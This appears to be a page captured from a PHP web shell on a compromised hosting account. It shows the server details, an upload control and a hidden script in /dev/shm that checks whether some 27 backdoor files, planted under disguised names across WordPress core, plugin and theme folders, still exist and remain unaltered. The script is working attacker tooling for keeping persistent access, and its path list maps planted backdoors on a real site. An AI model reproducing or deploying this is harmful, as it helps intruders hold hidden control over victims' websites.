HEX
Server: LiteSpeed
System: Linux server318.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
User: joyfejor (3859)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //dev/shm/.rec
<?php   $r = '/home/timbwqqd/public_html'; $x = ["/wp-includes/blocks/site-tagline/dutch_mimes.php"=>"bd@@111991818@@594",
"/wp-content/plugins/redux-framework/redux-templates/classes/templates/index.php"=>"bd@@112026176@@batch_process",
"/wp-admin/network/site-settings.php"=>"bd@@112026200@@system_core",
"/wp-includes/js/jquery/ui/stristr.php"=>"bd@@112002906@@1604",
"/wp-includes/blocks/post-featured-image/researchReports.php"=>"bd@@112002910@@707",
"/wp-admin/images/jpgraph_spider.php"=>"bd@@112002912@@1629",
"/wp-content/plugins/redux-framework/redux-core/inc/fields/link_color/index.php"=>"bd@@111980911@@auth_exception_handler",
"/wp-content/plugins/redux-framework/redux-core/inc/extensions/metaboxes/class-redux-metaboxes-api.php"=>"bd@@86614138@@reverse_lookup",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/generic/product-pricing-field/ucfirst.php"=>"bd@@107457404@@1998",
"/wp-includes/blocks/post-content/create_customers.php"=>"bd@@112026246@@1539",
"/wp-includes/blocks/calendar/conditions.php"=>"bd@@112026247@@1474",
"/wp-content/plugins/google-analytics-for-wordpress/assets/images/index.php"=>"bd@@111996807@@secure_access",
"/wp-includes/blocks/shortcode/timer.php"=>"bd@@112026248@@772",
"/wp-includes/sodium_compat/namespaced/Core/Curve25519/Ge/toolbar.config.php"=>"bd@@111997068@@625",
"/wp-includes/style-engine/class.wp.style.engine.css.declarations.php"=>"bd@@111997080@@1620",
"/wp-content/plugins/redux-framework/redux-core/inc/extensions/color_scheme/color_scheme/inc/class.redux.color.scheme.functions.php"=>"bd@@86614176@@2331",
"/wp-includes/SimplePie/library/SimplePie/Decode/NestedTree.php"=>"bd@@111997094@@2143",
"/wp-includes/js/jquery/FieldProfiles.php"=>"bd@@111997097@@1625",
"/wp-includes/blocks/comment-reply-link/edituser.php"=>"bd@@111997098@@592",
"/wp-includes/sodium_compat/src/Core/discografia.php"=>"bd@@111991773@@1669",
"/wp-content/themes/bild.php"=>"bd@@82504692@@820",
"/wp-includes/sodium_compat/src/Core/AEGIS/index.hacked.php"=>"bd@@111987704@@2307",
"/wp-includes/sodium_compat/src/Core/ChaCha20/Memory.php"=>"bd@@111987705@@1587",
"/wp-includes/js/tinymce/skins/lightgray/block_search.php"=>"bd@@111991806@@561",
"/wp-includes/blocks/template-part/Stats.php"=>"bd@@111987713@@2213",
"/wp-includes/css/dist/edit-post/manager.php"=>"bd@@111987712@@672",
"/wp-content/plugins/autodescription/inc/views/index.php"=>"bd@@111991655@@module_controller"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');